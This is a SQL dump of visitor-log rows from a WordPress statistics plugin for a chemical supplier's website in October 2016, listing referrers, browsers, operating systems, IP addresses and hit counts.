INSERT INTO `wp_statistics_visitor` VALUES (12437, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjFqsLlu_nPAhWi6IMKHUSmC6QQFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=Mu_yT2gqBkfWvfrNcYxLRw&bvm=bv.136811127,d.amc', 'MSIE', 'Windows', '11.0', '', '131.225.46.196', '000', 34, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12438, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.153.132.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12439, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '100.12.103.60', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12440, '2016-10-26', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiNsqTivfnPAhVIl34KHUmgCvIYABAF&sig=AOD64_0DPLM2iFnViHvP38CG1Vs3HwfrkQ&rct=j&q=&ved=0ahUKEwij4Z3ivfnPAhUBUGMKHXL7BcUQ0QwIJQ&adurl=', 'MSIE', 'Windows', '11.0', '', '192.188.123.5', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12441, '2016-10-26', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '71.169.3.46', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12442, '2016-10-26', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiD943mvfnPAhXUl34KHQE3BG8YABAA&sig=AOD64_1AHyRXRHh9fUUOfP-HaJzKJY4icg&rct=j&q=&ved=0ahUKEwjj2YnmvfnPAhXoxlQKHVnHC4sQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '172.16.5.172', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12443, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.242.141.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12444, '2016-10-26', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '142.1.71.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12445, '2016-10-26', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '6.2.8', '', '24.253.18.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12446, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.111.86.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12447, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.171.11.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12448, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.0', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12449, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '73.130.18.179', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12450, '2016-10-26', 'https://duckduckgo.com', 'Firefox', 'Windows', '47.0', '', '184.69.10.114', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12451, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12452, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.25.172.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12453, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '196.53.46.219', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12454, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.50.3.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12455, '2016-10-26', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwisoK2hx_nPAhVjqlQKHSaQBK0QFgghMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Faeroduster-ms-222n%2F&usg=AFQjCNEzu3QEEZ2Lv4bMlDb0Yu2v32f_0Q&bvm=bv.136593572,bs.1,d.cGw', 'MSIE', 'Windows', '11.0', '', '130.76.96.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12456, '2016-10-26', 'android-app://com.google.android.googlequicksearchbox', 'Chrome', 'Android', '54.0.2840.68', '', '107.77.76.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12457, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '205.160.245.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12458, '2016-10-26', 'https://www.miller-stephenson.com/product/epoxy-stripping-agent/', 'Firefox', 'Windows', '48.0', '', '98.178.189.89', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12459, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '112.226.98.158', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12460, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.212.18.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12461, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.140.235.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12462, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.35.9.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12463, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '38.0.2125.102', '', '2.53.34.154', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12464, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.200.239.161', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12465, '2016-10-26', 'https://www.google.com.vn/', 'Chrome', 'Windows', '53.0.2785.143', '', '42.113.163.47', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12466, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.120.34.237', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12467, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.167', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12468, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.110.120.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12469, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.219.24.73', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12470, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.154.80.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12471, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12472, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12473, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '219.91.153.59', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12474, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'iPhone', '54.0.2840.66', '', '68.231.43.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12475, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12476, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '72.152.73.142', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12477, '2016-10-26', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0.1', '', '17.205.14.243', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12478, '2016-10-26', 'https://uwestech.com.sg/index.php?route=product/product&product_id=51', 'Firefox', 'Windows', '49.0', '', '189.202.38.142', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12479, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12480, '2016-10-27', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '7.0', '', '65.55.210.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12481, '2016-10-27', 'https://www.google.ca/', 'Chrome', 'Linux', '54.0.2840.71', '', '47.55.199.96', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12482, '2016-10-27', 'android-app://com.google.android.googlequicksearchbox', 'Chrome', 'Android', '54.0.2840.68', '', '113.210.70.207', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12483, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '28.0', '', '104.131.31.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12484, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '7.0.3', '', '104.131.31.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12485, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '104.131.31.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12486, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '104.131.31.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12487, '2016-10-27', 'https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent', 'Chrome', 'Macintosh', '35.0.1916.114', '', '104.131.31.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12488, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/vazo/', 'Chrome', 'Windows', '34.0.1847.131', '', '104.131.31.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12489, '2016-10-27', 'https://www.miller-stephenson.com/miller-stephenson/', 'Chrome', 'Windows', '34.0.1847.137', '', '104.131.31.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12490, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/epon-epoxy-resin/epon-epoxy-novolac-resins/', 'Safari', 'iPhone', '7.0', '', '199.30.16.175', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12491, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.255.31.48', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12492, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '128.193.44.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12493, '2016-10-27', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '49.227.166.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12494, '2016-10-27', 'https://www.google.co.in/', 'Opera Next', 'Windows', '40.0.2308.90', '', '192.249.41.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12495, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.25.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12496, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '175.197.148.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12497, '2016-10-27', 'https://www.miller-stephenson.com/', 'Unknown', 'Unknown', 'Unknown', '', '175.197.148.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12498, '2016-10-27', 'https://globalwits.globalsou.com/crawl/searchResult.asp?id=55922', 'Chrome', 'Windows', '45.0.2454.101', '', '27.223.28.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12499, '2016-10-27', 'https://www.google.com/search?q=ptfe+release+agents&oq=ptfe+release+agents&gs_l=mobile-heirloom-serp.3..0i22i30l4.20271.34625.0.34900.39.30.1.5.5.2.504.5005.8j9j11j5-1.29.0....0...1c.1.34.mobile-heirloom-serp..10.29.3709.vkvEsErRyFs', 'Firefox', 'Android', '49.0', '', '174.199.34.139', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12500, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '68.115.12.229', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12501, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12502, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12503, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 118, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12504, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '75.84.178.30', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12505, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/', 'Safari', 'iPhone', '7.0', '', '131.253.25.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12506, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '128.193.44.191', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12507, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '176.98.75.235', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12508, '2016-10-27', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12509, '2016-10-27', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '36.0.1985.125', '', '220.181.132.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12510, '2016-10-27', 'https://transcoder.baidu.com/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%401%2Csz%40320_1001%2Cta%40iphone_2_6.0_3_537/baiduid=4BEF3485031C56438E211F2DE0C5B9AF/w=0_10_/t=iphone/l=3/tc?ref=www_iphone&lid=16284654449113494450&order=1&fm=alop&tj=www_normal_1_0_10_title&vit=osres&m=8&srd=1&cltj=cloud_title&asres=1&title=Miller-StephensonChemicalCompanyHomePage&dict=32&w_qd=IlPT2AEptyoA_yisJUulHj2szB0SQamnGAWOKq&sec=16225&di=53271e57dbfa1469&bdenc=1&tch=124.0.244.166.0.0&nsrc=IlPT2AEptyoA_yixCFOxXnANedT62v3IEQGG_yFR0jKrj9CobvXvG2FoUTz60niNHoCb9a&eqid=e1feb6f11164f0001000000258115f35&wd=&clk_info=%7B%22srcid%22%3A%221599%22%2C%22tplname%22%3A%22www_normal%22%2C%22t%22%3A1477533495903%2C%22xpath%22%3A%22div-a-h3%22%7D', 'Android Browser', 'Android', '4.0', '', '223.104.5.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12511, '2016-10-27', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '104.56.200.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12512, '2016-10-27', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.2.14', '', '24.106.220.130', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12513, '2016-10-27', 'miller-stephenson.com', 'Firefox', 'Windows', '3.6.28', '', '192.99.147.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12514, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/', 'Safari', 'Macintosh', '9.1.2', '', '100.8.97.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12515, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '209.34.201.197', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12516, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&uact=8&ved=0ahUKEwi_j-eT-vnPAhUGKyYKHeGlCNUQFggjMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA&bvm=bv.136811127,d.eWE', 'MSIE', 'Windows', '11.0', '', '138.163.0.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12517, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'MSIE', 'Windows', '11.0', '', '138.163.0.41', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12518, '2016-10-27', 'https://www.seeingmeerkat.com/', 'Opera', 'Windows', '7.54', '', '178.137.95.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12519, '2016-10-27', 'https://search.yahoo.co.jp/search?&ei=UTF-8&p=epon%20828&fr=top_smf&aq=0&oq=epon%208&aa=0&ts=102577&at=s&ai=aQ1cvgw5TqifaiydSYuxfA', 'Chrome', 'Android', '38.0.2125.102', '', '182.251.250.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12520, '2016-10-27', 'https://www.miller-stephenson.com', 'ok', 'Unknown', '2.5.0', '', '42.156.251.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12521, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/', 'Safari', 'iPad', '10.0', '', '199.167.119.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12522, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '42.0.2307.2', '', '42.156.251.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12523, '2016-10-27', 'https://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwjJ852QgPrPAhVKJ5QKHem7Av8QFgg_MAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-240ac%2F&usg=AFQjCNGMGT-9sDD56bUfjS2_Mysw8RHfIA', 'MSIE', 'Windows', '11.0', '', '124.33.111.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12524, '2016-10-27', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '71.86.74.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12525, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '71.86.74.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12526, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '5.1', '', '46.229.173.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12527, '2016-10-27', 'https://kursy-ege.ru/', 'MSIE', 'Windows', '6.0', '', '176.8.88.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12528, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.28', '', '45.43.222.49', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12529, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.150', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12530, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.84', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12531, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '5.1', '', '46.229.173.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12532, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjs4uCPhvrPAhUFWCwKHbk3DK8QFgghMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw', 'MSIE', 'Windows', '11.0', '', '57.97.111.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12533, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/ptfe-dryfilm-lubricants/', 'MSIE', 'Windows', '11.0', '', '57.97.111.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12534, '2016-10-27', 'https://www.miller-stephenson.com/chemical-products/', 'MSIE', 'Windows', '11.0', '', '57.97.111.77', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12535, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'MSIE', 'Windows', '11.0', '', '57.97.111.76', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12536, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/', 'MSIE', 'Windows', '11.0', '', '57.97.111.75', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12537, '2016-10-27', 'https://medicines-choice.com/', 'MSIE', 'Windows', '6.0', '', '46.119.118.233', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12538, '2016-10-27', 'https://www.miller-stephenson.com/chemical-products/', 'MSIE', 'Windows', '11.0', '', '57.97.111.73', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12539, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'MSIE', 'Windows', '11.0', '', '57.97.111.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12540, '2016-10-27', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '46.229.173.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12541, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '18.0.1025.308', '', '46.229.173.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12542, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '21.0', '', '46.229.173.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12543, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '43.0', '', '83.217.27.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12544, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '51.254.212.37', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12545, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '7.0', '', '62.210.111.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12546, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '62.210.111.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12547, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '115.115.183.198', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12548, '2016-10-27', 'https://www.miller-stephenson.com/product/aeroduster-ms-222n/', 'Chrome', 'Windows', '54.0.2840.71', '', '117.247.177.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12549, '2016-10-27', 'https://www.weburlopener.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '117.247.177.169', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12550, '2016-10-27', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '34.0', '', '196.196.94.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12551, '2016-10-27', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '196.196.94.220', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12552, '2016-10-27', 'https://www.google.com.vn/', 'Chrome', 'Windows', '52.3.2743.134', '', '42.118.198.202', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12553, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '45.19.166.0', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12554, '2016-10-27', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj4zaPel_rPAhVNa34KHUdPAxAYABAA&sig=AOD64_1gpKZulBgyfewgdIKwDImgZtUl0g&rct=j&q=&ved=0ahUKEwjJ-p_el_rPAhUq6oMKHc8cCaIQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '66.51.74.110', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12555, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '34.0.1847.131', '', '62.210.111.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12556, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12557, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12558, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '14.0.835.202', '', '104.188.249.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12559, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '28.0', '', '146.0.74.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12560, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '112.226.101.67', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12561, '2016-10-27', 'https://www.google.fr/', 'Chrome', 'Windows', '54.0.2840.71', '', '82.230.99.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12562, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '182.75.20.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12563, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '37.0.2062.124', '', '54.159.120.26', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12564, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '54.224.228.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12565, '2016-10-27', 'https://www.miller-stephenson.com', 'Go', 'Unknown', 'Unknown', '', '54.224.228.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12566, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '54.196.109.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12567, '2016-10-27', 'https://www.miller-stephenson.com', 'Go', 'Unknown', 'Unknown', '', '54.196.109.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12568, '2016-10-27', 'https://www.google.co.in/', 'Chrome', 'Windows', '49.0.2623.112', '', '182.71.39.42', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12569, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '36.0.1985.125', '', '46.28.199.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12570, '2016-10-27', 'https://www.miller-stephenson.com/my-account/', 'Chrome', 'Windows', '49.0.2623.112', '', '103.232.232.132', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12571, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '32.0.1700.76', '', '54.224.66.53', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12572, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.25.131', '000', 1, 0); 
